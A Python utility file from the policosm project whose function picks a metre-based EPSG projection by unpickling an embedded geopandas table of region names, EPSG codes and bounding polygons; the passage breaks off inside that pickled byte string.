| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eaaf5d912a6810d2c3bffe0c58abef9b546c2436
| 60,874
|
py
|
Python
|
policosm/utils/projections.py
|
ComplexCity/policosm
|
548d4d694df49603f91cd45af7fe50ced79aea68
|
[
"MIT"
] | 6
|
2017-06-05T07:30:46.000Z
|
2022-03-07T00:47:22.000Z
|
policosm/utils/projections.py
|
ComplexCity/policosm
|
548d4d694df49603f91cd45af7fe50ced79aea68
|
[
"MIT"
] | 1
|
2017-12-14T05:40:42.000Z
|
2017-12-14T05:40:42.000Z
|
policosm/utils/projections.py
|
ComplexCity/policosm
|
548d4d694df49603f91cd45af7fe50ced79aea68
|
[
"MIT"
] | 1
|
2020-10-22T19:18:30.000Z
|
2020-10-22T19:18:30.000Z
|
# -*- coding: utf-8 -*-
import pickle
from utm import latitude_to_zone_letter, latlon_to_zone_number
def get_most_accurate_epsg(coordinates):
"""Gets the EPSG code for closest know area projection in meters. the pickle is prepared as a geopandas"""
gdf = pickle.loads(
b'\x80\x03cgeopandas.geodataframe\nGeoDataFrame\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00_dataq\x03cpandas.core.internals.managers\nBlockManager\nq\x04)\x81q\x05(]q\x06(cpandas.core.indexes.base\n_new_Index\nq\x07cpandas.core.indexes.base\nIndex\nq\x08}q\t(X\x04\x00\x00\x00dataq\ncnumpy.core.multiarray\n_reconstruct\nq\x0bcnumpy\nndarray\nq\x0cK\x00\x85q\rC\x01bq\x0e\x87q\x0fRq\x10(K\x01K\x03\x85q\x11cnumpy\ndtype\nq\x12X\x02\x00\x00\x00O8q\x13K\x00K\x01\x87q\x14Rq\x15(K\x03X\x01\x00\x00\x00|q\x16NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK?tq\x17b\x89]q\x18(X\x04\x00\x00\x00nameq\x19X\x04\x00\x00\x00epsgq\x1aX\x08\x00\x00\x00geometryq\x1betq\x1cbX\x04\x00\x00\x00nameq\x1dNu\x86q\x1eRq\x1fh\x07cpandas.core.indexes.range\nRangeIndex\nq }q!(h\x1dNX\x05\x00\x00\x00startq"K\x00X\x04\x00\x00\x00stopq#K\xa9X\x04\x00\x00\x00stepq$K\x01u\x86q%Rq&e]q\'(h\x0bh\x0cK\x00\x85q(h\x0e\x87q)Rq*(K\x01K\x02K\xa9\x86q+h\x15\x89]q,(X\x07\x00\x00\x00Montanaq-X\r\x00\x00\x00West Virginiaq.h.X\x0c\x00\x00\x00Pennsylvaniaq/h/X\x05\x00\x00\x00Texasq0h0h0h0h0X\x0e\x00\x00\x00South Carolinaq1X\x07\x00\x00\x00Vermontq2X\x0e\x00\x00\x00American Samoaq3X\x04\x00\x00\x00Utahq4h4h4X\x04\x00\x00\x00Guamq5X\x18\x00\x00\x00Northern Mariana Islandsq6X\n\x00\x00\x00Washingtonq7h7X\x06\x00\x00\x00Alaskaq8X\r\x00\x00\x00Massachusettsq9h9X\x08\x00\x00\x00Michiganq:h:h:X\x07\x00\x00\x00Alabamaq;h;X\n\x00\x00\x00Californiaq<X\x08\x00\x00\x00Kentuckyq=X\x07\x00\x00\x00Arizonaq>h>h>X\x08\x00\x00\x00Arkansasq?h?X\x0c\x00\x00\x00South Dakotaq@h@X\t\x00\x00\x00TennesseeqAX\x08\x00\x00\x00ColoradoqBhBhBX\x0b\x00\x00\x00ConnecticutqCX\x0b\x00\x00\x00MississippiqDhDX\x08\x00\x00\x00MissouriqEhEhEX\x08\x00\x00\x00OklahomaqFhFX\x06\x00\x00\x00OregonqGX\x08\x00\x00\x00VirginiaqHhHX\x08\x00\x00\x00MarylandqIX\x07\x00\x00\x00WyomingqJhJhJhJX\x04\x00\x00\x00OhioqKhKX\t\x00\x00\x00MinnesotaqLhLhLX\x0b\x00\x00\x00Puerto RicoqMX\x06\x00\x00\x00KansasqNhNX\x0c\x00\x00\x00North DakotaqOhOX\x13\x00\x00\x00U.S. Virgin IslandsqPX\x14\x00\x00\x00District of ColumbiaqQX\x08\x00\x00\x00DelawareqRX\x07\x00\x00\x00GeorgiaqShSX\x07\x00\x00\x00FloridaqThThTX\x06\x00\x00\x00HawaiiqUhUhUhUhUX\t\x00\x00\x00LouisianaqVhVX\x08\x00\x00\x00IllinoisqWhWX\x05\x00\x00\x00IdahoqXhXhXX\x04\x00\x00\x00IowaqYhYX\x07\x00\x00\x00IndianaqZhZX\x08\x00\x00\x00Nebraskaq[X\x05\x00\x00\x00Maineq\\h\\X\x0e\x00\x00\x00North Carolinaq]X\x08\x00\x00\x00New Yorkq^h^h^h^X\n\x00\x00\x00New Mexicoq_h_h_X\n\x00\x00\x00New Jerseyq`X\r\x00\x00\x00New HampshireqaX\t\x00\x00\x00WisconsinqbhbhbX\x06\x00\x00\x00NevadaqchchcX\x0c\x00\x00\x00Rhode IslandqdX\x0c\x00\x00\x00RGF93 / CC42qeX\x0c\x00\x00\x00RGF93 / CC43qfX\x0c\x00\x00\x00RGF93 / CC44qgX\x0c\x00\x00\x00RGF93 / CC45qhX\x0c\x00\x00\x00RGF93 / CC46qiX\x0c\x00\x00\x00RGF93 / CC47qjX\x0c\x00\x00\x00RGF93 / CC48qkX\x0c\x00\x00\x00RGF93 / CC49qlX\x0c\x00\x00\x00RGF93 / CC50qmX\x15\x00\x00\x00RGAF09 / UTM zone 20NqnX\x15\x00\x00\x00RGFG95 / UTM zone 22NqoX\x14\x00\x00\x00RGR92 / UTM zone 40SqpX\x16\x00\x00\x00RGSPM06 / UTM zone 21NqqX\x14\x00\x00\x00RGM04 / UTM zone 38SqrX\x06\x00\x00\x00europeqshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshsX\x04\x00\x00\x003604qtX\x04\x00\x00\x003693quX\x04\x00\x00\x003694qvX\x04\x00\x00\x003649qwX\x04\x00\x00\x003651qxX\x04\x00\x00\x003673qyX\x04\x00\x00\x003671qzX\x04\x00\x00\x003669q{X\x04\x00\x00\x003667q|X\x04\x00\x00\x003663q}X\x04\x00\x00\x003655q~X\x04\x00\x00\x003684q\x7fX\x04\x00\x00\x002195q\x80X\x04\x00\x00\x003681q\x81X\x04\x00\x00\x003678q\x82X\x04\x00\x00\x003675q\x83X\x04\x00\x00\x006323q\x84h\x84X\x04\x00\x00\x003691q\x85X\x04\x00\x00\x003689q\x86X\x04\x00\x00\x003467q\x87X\x04\x00\x00\x003583q\x88X\x04\x00\x00\x003585q\x89X\x04\x00\x00\x003587q\x8aX\x04\x00\x00\x003589q\x8bX\x04\x00\x00\x003592q\x8cX\x04\x00\x00\x003466q\x8dX\x04\x00\x00\x003465q\x8eX\x04\x00\x00\x003488q\x8fX\x04\x00\x00\x003546q\x90X\x04\x00\x00\x003478q\x91X\x04\x00\x00\x003480q\x92X\x04\x00\x00\x003482q\x93X\x04\x00\x00\x003484q\x94X\x04\x00\x00\x003486q\x95X\x04\x00\x00\x003657q\x96X\x04\x00\x00\x003659q\x97X\x04\x00\x00\x003661q\x98X\x04\x00\x00\x003505q\x99X\x04\x00\x00\x003503q\x9aX\x04\x00\x00\x003501q\x9bX\x04\x00\x00\x003507q\x9cX\x04\x00\x00\x003597q\x9dX\x04\x00\x00\x003599q\x9eX\x04\x00\x00\x003601q\x9fX\x04\x00\x00\x003602q\xa0X\x04\x00\x00\x003603q\xa1X\x04\x00\x00\x003641q\xa2X\x04\x00\x00\x003639q\xa3X\x04\x00\x00\x003643q\xa4X\x04\x00\x00\x003685q\xa5X\x04\x00\x00\x003687q\xa6X\x04\x00\x00\x003559q\xa7X\x04\x00\x00\x003702q\xa8X\x04\x00\x00\x003703q\xa9X\x04\x00\x00\x003704q\xaaX\x04\x00\x00\x003705q\xabX\x04\x00\x00\x003637q\xacX\x04\x00\x00\x003638q\xadX\x04\x00\x00\x003596q\xaeX\x04\x00\x00\x003595q\xafX\x04\x00\x00\x003594q\xb0X\x04\x00\x00\x004437q\xb1X\x04\x00\x00\x003540q\xb2X\x04\x00\x00\x003542q\xb3X\x04\x00\x00\x003633q\xb4X\x04\x00\x00\x003635q\xb5h\xb1h\xa7X\x04\x00\x00\x003509q\xb6X\x04\x00\x00\x003518q\xb7X\x04\x00\x00\x003520q\xb8X\x04\x00\x00\x003511q\xb9X\x04\x00\x00\x003514q\xbaX\x04\x00\x00\x003516q\xbbX\x05\x00\x00\x0026961q\xbcX\x05\x00\x00\x0026962q\xbdX\x05\x00\x00\x0026963q\xbeX\x05\x00\x00\x0026964q\xbfX\x05\x00\x00\x0026965q\xc0X\x04\x00\x00\x003550q\xc1X\x04\x00\x00\x003552q\xc2X\x04\x00\x00\x003530q\xc3X\x04\x00\x00\x003528q\xc4X\x04\x00\x00\x003526q\xc5X\x04\x00\x00\x003524q\xc6X\x04\x00\x00\x003522q\xc7X\x04\x00\x00\x003538q\xc8X\x04\x00\x00\x003536q\xc9X\x04\x00\x00\x003534q\xcaX\x04\x00\x00\x003532q\xcbX\x04\x00\x00\x003606q\xccX\x04\x00\x00\x003558q\xcdX\x04\x00\x00\x003557q\xceX\x04\x00\x00\x003631q\xcfX\x04\x00\x00\x003629q\xd0X\x04\x00\x00\x003627q\xd1X\x04\x00\x00\x003625q\xd2X\x04\x00\x00\x003623q\xd3X\x04\x00\x00\x003617q\xd4X\x04\x00\x00\x003619q\xd5X\x04\x00\x00\x003621q\xd6X\x04\x00\x00\x003615q\xd7X\x04\x00\x00\x003613q\xd8X\x04\x00\x00\x003695q\xd9X\x04\x00\x00\x003697q\xdaX\x04\x00\x00\x003699q\xdbX\x04\x00\x00\x003607q\xdcX\x04\x00\x00\x003609q\xddX\x04\x00\x00\x003611q\xdeX\x04\x00\x00\x003653q\xdfX\x04\x00\x00\x003942q\xe0X\x04\x00\x00\x003943q\xe1X\x04\x00\x00\x003944q\xe2X\x04\x00\x00\x003945q\xe3X\x04\x00\x00\x003946q\xe4X\x04\x00\x00\x003947q\xe5X\x04\x00\x00\x003948q\xe6X\x04\x00\x00\x003949q\xe7X\x04\x00\x00\x003950q\xe8X\x04\x00\x00\x005490q\xe9X\x04\x00\x00\x002972q\xeaX\x04\x00\x00\x002975q\xebX\x04\x00\x00\x004467q\xecX\x04\x00\x00\x004471q\xedX\x04\x00\x00\x003035q\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeh\xeeetq\xefbcgeopandas.array\nGeometryArray\nq\xf0)\x81q\xf1}q\xf2h\nh\x0bh\x0cK\x00\x85q\xf3h\x0e\x87q\xf4Rq\xf5(K\x01K\xa9\x85q\xf6h\x15\x89]q\xf7(cshapely.geometry.polygon\nPolygon\nq\xf8)Rq\xf9C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\r\x00\x00@3\x03]\xc0\x00\x00\x00`$\x80H@!\x00\x00 \x88\x02Z\xc0\x00\x00\x00`$\x80H@!\x00\x00 \x88\x02Z\xc0\xfe\xff\xff\x1f\xda-F@\r\x00\x00@3\x03]\xc0\xfe\xff\xff\x1f\xda-F@\r\x00\x00@3\x03]\xc0\x00\x00\x00`$\x80H@q\xfabh\xf8)Rq\xfbC]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00q=\n\xd7\xa3pT\xc0q=\n\xd7\xa3PD@\x1f\x85\xebQ\xb8nS\xc0q=\n\xd7\xa3PD@\x1f\x85\xebQ\xb8nS\xc0\x00\x00\x00\x00\x00`C@q=\n\xd7\xa3pT\xc0\x00\x00\x00\x00\x00`C@q=\n\xd7\xa3pT\xc0q=\n\xd7\xa3PD@q\xfcbh\xf8)Rq\xfdC]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x9a\x99\x99\x99\x99\xa9T\xc0\xd7\xa3p=\n\x97C@33333\xc3S\xc0\xd7\xa3p=\n\x97C@33333\xc3S\xc0\x9a\x99\x99\x99\x99\x99B@\x9a\x99\x99\x99\x99\xa9T\xc0\x9a\x99\x99\x99\x99\x99B@\x9a\x99\x99\x99\x99\xa9T\xc0\xd7\xa3p=\n\x97C@q\xfebh\xf8)Rq\xffC]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe1z\x14\xaeG!T\xc0\xe1z\x14\xaeGAE@\\\x8f\xc2\xf5(\xacR\xc0\xe1z\x14\xaeGAE@\\\x8f\xc2\xf5(\xacR\xc0\xcd\xcc\xcc\xcc\xccLD@\xe1z\x14\xaeG!T\xc0\xcd\xcc\xcc\xcc\xccLD@\xe1z\x14\xaeG!T\xc0\xe1z\x14\xaeGAE@r\x00\x01\x00\x00bh\xf8)Rr\x01\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe1z\x14\xaeG!T\xc0\xd7\xa3p=\n\x97D@\xaeG\xe1z\x14\xaeR\xc0\xd7\xa3p=\n\x97D@\xaeG\xe1z\x14\xaeR\xc0{\x14\xaeG\xe1\xdaC@\xe1z\x14\xaeG!T\xc0{\x14\xaeG\xe1\xdaC@\xe1z\x14\xaeG!T\xc0\xd7\xa3p=\n\x97D@r\x02\x01\x00\x00bh\xf8)Rr\x03\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00@Z\xc0)\\\x8f\xc2\xf5\xa8>@\x85\xebQ\xb8\x1euW\xc0)\\\x8f\xc2\xf5\xa8>@\x85\xebQ\xb8\x1euW\xc0R\xb8\x1e\x85\xeb\xd1;@\x00\x00\x00\x00\x00@Z\xc0R\xb8\x1e\x85\xeb\xd1;@\x00\x00\x00\x00\x00@Z\xc0)\\\x8f\xc2\xf5\xa8>@r\x04\x01\x00\x00bh\xf8)Rr\x05\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xcd\xcc\xcc\xcc\xcc\x0cY\xc0333333<@H\xe1z\x14\xaeGX\xc0333333<@H\xe1z\x14\xaeGX\xc0\x14\xaeG\xe1z\xd49@\xcd\xcc\xcc\xcc\xcc\x0cY\xc0\x14\xaeG\xe1z\xd49@\xcd\xcc\xcc\xcc\xcc\x0cY\xc0333333<@r\x06\x01\x00\x00bh\xf8)Rr\x07\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\xc3Y\xc0\n\xd7\xa3p=JA@\x00\x00\x00\x00\x00\x80W\xc0\n\xd7\xa3p=JA@\x00\x00\x00\x00\x00\x80W\xc0=\n\xd7\xa3p\xbd?@33333\xc3Y\xc0=\n\xd7\xa3p\xbd?@33333\xc3Y\xc0\n\xd7\xa3p=JA@r\x08\x01\x00\x00bh\xf8)Rr\t\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\xc3Y\xc0\x00\x00\x00\x00\x00@B@\x00\x00\x00\x00\x00\x00Y\xc0\x00\x00\x00\x00\x00@B@\x00\x00\x00\x00\x00\x00Y\xc0H\xe1z\x14\xae\'A@33333\xc3Y\xc0H\xe1z\x14\xae\'A@33333\xc3Y\xc0\x00\x00\x00\x00\x00@B@r\n\x01\x00\x00bh\xf8)Rr\x0b\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xb8\x1e\x85\xebQ\xa8Z\xc0\xe1z\x14\xaeG!@@q=\n\xd7\xa3`W\xc0\xe1z\x14\xaeG!@@q=\n\xd7\xa3`W\xc0H\xe1z\x14\xae\xc7=@\xb8\x1e\x85\xebQ\xa8Z\xc0H\xe1z\x14\xae\xc7=@\xb8\x1e\x85\xebQ\xa8Z\xc0\xe1z\x14\xaeG!@@r\x0c\x01\x00\x00bh\xf8)Rr\r\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\xa8\xd6T\xc0\xff\xff\xff\xdf\x96\x9bA@\xfe\xff\xff\x7f\xf4\x9fS\xc0\xff\xff\xff\xdf\x96\x9bA@\xfe\xff\xff\x7f\xf4\x9fS\xc0\xfb\xff\xff\x7fC\x04@@\x00\x00\x00\x00\xa8\xd6T\xc0\xfb\xff\xff\x7fC\x04@@\x00\x00\x00\x00\xa8\xd6T\xc0\xff\xff\xff\xdf\x96\x9bA@r\x0e\x01\x00\x00bh\xf8)Rr\x0f\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x04\\R\xc0\xfe\xff\xff\x1f"\x82F@\x00\x00\x00`\xc8\xddQ\xc0\xfe\xff\xff\x1f"\x82F@\x00\x00\x00`\xc8\xddQ\xc0\x05\x00\x00 \x0c]E@\x00\x00\x00\x00\x04\\R\xc0\x05\x00\x00 \x0c]E@\x00\x00\x00\x00\x04\\R\xc0\xfe\xff\xff\x1f"\x82F@r\x10\x01\x00\x00bh\xf8)Rr\x11\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x9c\x82\xa1\xb3qie\xc0\xc0\xe6\xc1\x82\xa0\xb0%\xc0\x84\xdc\xa0Q\xd5\xfdd\xc0\xc0\xe6\xc1\x82\xa0\xb0%\xc0\x84\xdc\xa0Q\xd5\xfdd\xc0\x83@\x1dE\x8c\x85-\xc0\x9c\x82\xa1\xb3qie\xc0\x83@\x1dE\x8c\x85-\xc0\x9c\x82\xa1\xb3qie\xc0\xc0\xe6\xc1\x82\xa0\xb0%\xc0r\x12\x01\x00\x00bh\xf8)Rr\x13\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\x83\\\xc0\n\xd7\xa3p=JC@33333C[\xc0\n\xd7\xa3p=JC@33333C[\xc0\x00\x00\x00\x00\x00\x80B@33333\x83\\\xc0\x00\x00\x00\x00\x00\x80B@33333\x83\\\xc0\n\xd7\xa3p=JC@r\x14\x01\x00\x00bh\xf8)Rr\x15\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\x83\\\xc0\x00\x00\x00\x00\x00\x00E@33333C[\xc0\x00\x00\x00\x00\x00\x00E@33333C[\xc0fffffFD@33333\x83\\\xc0fffffFD@33333\x83\\\xc0\x00\x00\x00\x00\x00\x00E@r\x16\x01\x00\x00bh\xf8)Rr\x17\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x0033333\x83\\\xc0\n\xd7\xa3p=\x8aD@33333C[\xc0\n\xd7\xa3p=\x8aD@33333C[\xc0\x00\x00\x00\x00\x00@C@33333\x83\\\xc0\x00\x00\x00\x00\x00@C@33333\x83\\\xc0\n\xd7\xa3p=\x8aD@r\x18\x01\x00\x00bh\xf8)Rr\x19\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xeav\xf6\x95\x07\x12b@u><K\x90i+@z\xa6\x97\x18K b@u><K\x90i+@z\xa6\x97\x18K b@\x13\xd5[\x03[]*@\xeav\xf6\x95\x07\x12b@\x13\xd5[\x03[]*@\xeav\xf6\x95\x07\x12b@u><K\x90i+@r\x1a\x01\x00\x00bh\xf8)Rr\x1b\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x02\xd3i\xdd\x06\x1ab@\x0f\'0\x9d\xd6\x9d4@=}\x04\xfe\xf0Db@\x0f\'0\x9d\xd6\x9d4@=}\x04\xfe\xf0Db@B[\xce\xa5\xb8\x12,@\x02\xd3i\xdd\x06\x1ab@B[\xce\xa5\xb8\x12,@\x02\xd3i\xdd\x06\x1ab@\x0f\'0\x9d\xd6\x9d4@r\x1c\x01\x00\x00bh\xf8)Rr\x1d\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00 _\xc0\xcd\xcc\xcc\xcc\xcc\xccG@\x9a\x99\x99\x99\x999]\xc0\xcd\xcc\xcc\xcc\xcc\xccG@\x9a\x99\x99\x99\x999]\xc0fffff\xc6F@\x00\x00\x00\x00\x00 _\xc0fffff\xc6F@\x00\x00\x00\x00\x00 _\xc0\xcd\xcc\xcc\xcc\xcc\xccG@r\x1e\x01\x00\x00bh\xf8)Rr\x1f\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x000_\xc0\x00\x00\x00\x00\x00\x80H@R\xb8\x1e\x85\xebA]\xc0\x00\x00\x00\x00\x00\x80H@R\xb8\x1e\x85\xebA]\xc0\n\xd7\xa3p=\x8aG@\x00\x00\x00\x00\x000_\xc0\n\xd7\xa3p=\x8aG@\x00\x00\x00\x00\x000_\xc0\x00\x00\x00\x00\x00\x80H@r \x01\x00\x00bh\xf8)Rr!\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xe2X\x17\xb7\xd1df\xc0\x02\x00\x00\x80\xb5\xe6Q@\xd3Mb\x10X?`\xc0\x02\x00\x00\x80\xb5\xe6Q@\xd3Mb\x10X?`\xc0\xfd\xff\xff_\xed\x82I@\xe2X\x17\xb7\xd1df\xc0\xfd\xff\xff_\xed\x82I@\xe2X\x17\xb7\xd1df\xc0\x02\x00\x00\x80\xb5\xe6Q@r"\x01\x00\x00bh\xf8)Rr#\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00H\xe1z\x14\xae\xb7Q\xc0\xe1z\x14\xaeG\xc1D@\x9a\x99\x99\x99\x99yQ\xc0\xe1z\x14\xaeG\xc1D@\x9a\x99\x99\x99\x99yQ\xc0\x9a\x99\x99\x99\x99\x99D@H\xe1z\x14\xae\xb7Q\xc0\x9a\x99\x99\x99\x99\x99D@H\xe1z\x14\xae\xb7Q\xc0\xe1z\x14\xaeG\xc1D@r$\x01\x00\x00bh\xf8)Rr%\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00q=\n\xd7\xa3`R\xc0R\xb8\x1e\x85\xebqE@\xd7\xa3p=\nwQ\xc0R\xb8\x1e\x85\xebqE@\xd7\xa3p=\nwQ\xc0\xcd\xcc\xcc\xcc\xcc\xacD@q=\n\xd7\xa3`R\xc0\xcd\xcc\xcc\xcc\xcc\xacD@q=\n\xd7\xa3`R\xc0R\xb8\x1e\x85\xebqE@r&\x01\x00\x00bh\xf8)Rr\'\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xf6(\\\x8f\xc2\xc5U\xc0q=\n\xd7\xa3\xf0F@\x8f\xc2\xf5(\\\x8fT\xc0q=\n\xd7\xa3\xf0F@\x8f\xc2\xf5(\\\x8fT\xc0H\xe1z\x14\xae\xe7E@\xf6(\\\x8f\xc2\xc5U\xc0H\xe1z\x14\xae\xe7E@\xf6(\\\x8f\xc2\xc5U\xc0q=\n\xd7\xa3\xf0F@r(\x01\x00\x00bh\xf8)Rr)\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\n\xd7\xa3p=\x9aV\xc0fffff&H@{\x14\xaeG\xe1\xdaT\xc0fffff&H@{\x14\xaeG\xe1\xdaT\xc0\x1f\x85\xebQ\xb8\x9eF@\n\xd7\xa3p=\x9aV\xc0\x1f\x85\xebQ\xb8\x9eF@\n\xd7\xa3p=\x9aV\xc0fffff&H@r*\x01\x00\x00bh\xf8)Rr+\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00)\\\x8f\xc2\xf5\xc8U\xc0\xf6(\\\x8f\xc2\x15F@H\xe1z\x14\xae\x87T\xc0\xf6(\\\x8f\xc2\x15F@H\xe1z\x14\xae\x87T\xc0\x00\x00\x00\x00\x00\xe0D@)\\\x8f\xc2\xf5\xc8U\xc0\x00\x00\x00\x00\x00\xe0D@)\\\x8f\xc2\xf5\xc8U\xc0\xf6(\\\x8f\xc2\x15F@r,\x01\x00\x00bh\xf8)Rr-\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x1f\x85\xebQ\xb8\x1eV\xc0\x00\x00\x00\x00\x00\x80A@33333\x93U\xc0\x00\x00\x00\x00\x00\x80A@33333\x93U\xc0333333>@\x1f\x85\xebQ\xb8\x1eV\xc0333333>@\x1f\x85\xebQ\xb8\x1eV\xc0\x00\x00\x00\x00\x00\x80A@r.\x01\x00\x00bh\xf8)Rr/\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xc3\xf5(\\\x8f\xb2U\xc0\x00\x00\x00\x00\x00\x80A@)\\\x8f\xc2\xf58U\xc0\x00\x00\x00\x00\x00\x80A@)\\\x8f\xc2\xf58U\xc0\x00\x00\x00\x00\x00\x00?@\xc3\xf5(\\\x8f\xb2U\xc0\x00\x00\x00\x00\x00\x00?@\xc3\xf5(\\\x8f\xb2U\xc0\x00\x00\x00\x00\x00\x80A@r0\x01\x00\x00bh\xf8)Rr1\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xea\xff\xff?\xd9\x1e_\xc0\x04\x00\x00`7\x01E@\xf5\xff\xff\x9f^\x88\\\xc0\x04\x00\x00`7\x01E@\xf5\xff\xff\x9f^\x88\\\xc0\x04\x00\x00`\xc7C@@\xea\xff\xff?\xd9\x1e_\xc0\x04\x00\x00`\xc7C@@\xea\xff\xff?\xd9\x1e_\xc0\x04\x00\x00`7\x01E@r2\x01\x00\x00bh\xf8)Rr3\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\xa0\x93dV\xc0\x00\x00\x00\x00\xe0\x92C@\x04\x00\x00\x00\xbb}T\xc0\x00\x00\x00\x00\xe0\x92C@\x04\x00\x00\x00\xbb}T\xc0\x00\x00\x00`\x94?B@\x00\x00\x00\xa0\x93dV\xc0\x00\x00\x00`\x94?B@\x00\x00\x00\xa0\x93dV\xc0\x00\x00\x00\x00\xe0\x92C@r4\x01\x00\x00bh\xf8)Rr5\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x85\xebQ\xb8\x1eU\\\xc0\x00\x00\x00\x00\x00\x80B@\xcd\xcc\xcc\xcc\xcc\x9c[\xc0\x00\x00\x00\x00\x00\x80B@\xcd\xcc\xcc\xcc\xcc\x9c[\xc0\x14\xaeG\xe1zT?@\x85\xebQ\xb8\x1eU\\\xc0\x14\xaeG\xe1zT?@\x85\xebQ\xb8\x1eU\\\xc0\x00\x00\x00\x00\x00\x80B@r6\x01\x00\x00bh\xf8)Rr7\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xaeG\xe1z\x14\xee[\xc0\x00\x00\x00\x00\x00\x80B@33333C[\xc0\x00\x00\x00\x00\x00\x80B@33333C[\xc0\x14\xaeG\xe1zT?@\xaeG\xe1z\x14\xee[\xc0\x14\xaeG\xe1zT?@\xaeG\xe1z\x14\xee[\xc0\x00\x00\x00\x00\x00\x80B@r8\x01\x00\x00bh\xf8)Rr9\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\xb0\\\xc0\x00\x00\x00\x00\x00\x80B@\xe1z\x14\xaeG!\\\xc0\x00\x00\x00\x00\x00\x80B@\xe1z\x14\xaeG!\\\xc0\x85\xebQ\xb8\x1e\x05@@\x00\x00\x00\x00\x00\xb0\\\xc0\x85\xebQ\xb8\x1e\x05@@\x00\x00\x00\x00\x00\xb0\\\xc0\x00\x00\x00\x00\x00\x80B@r:\x01\x00\x00bh\xf8)Rr;\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\xb8\x1e\x85\xebQ\xa8W\xc0\x1f\x85\xebQ\xb8>B@\x9a\x99\x99\x99\x99iV\xc0\x1f\x85\xebQ\xb8>B@\x9a\x99\x99\x99\x99iV\xc0\x14\xaeG\xe1zTA@\xb8\x1e\x85\xebQ\xa8W\xc0\x14\xaeG\xe1zTA@\xb8\x1e\x85\xebQ\xa8W\xc0\x1f\x85\xebQ\xb8>B@r<\x01\x00\x00bh\xf8)Rr=\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x8f\xc2\xf5(\\\x9fW\xc0\xecQ\xb8\x1e\x85\x8bA@\xa4p=\n\xd7\x83V\xc0\xecQ\xb8\x1e\x85\x8bA@\xa4p=\n\xd7\x83V\xc0\x00\x00\x00\x00\x00\x80@@\x8f\xc2\xf5(\\\x9fW\xc0\x00\x00\x00\x00\x00\x80@@\x8f\xc2\xf5(\\\x9fW\xc0\xecQ\xb8\x1e\x85\x8bA@r>\x01\x00\x00bh\xf8)Rr?\x01\x00\x00C]\x01\x03\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x14\xaeG\xe1z\x04Z\xc0\xb8\x1e\x85\xebQ\xf8F@=\n\xd7\xa3p\x1dX\xc0\xb8\x1e\x85\xebQ\xf8F@=\n\xd7\xa3p\x1dX\xc0R\xb8\x1e\x85\xeb\x11F@\x14\xaeG\xe1z\x04Z\xc0R\xb8\x1e\x85\xeb\x11F@\x14\xaeG\xe1z\x04Z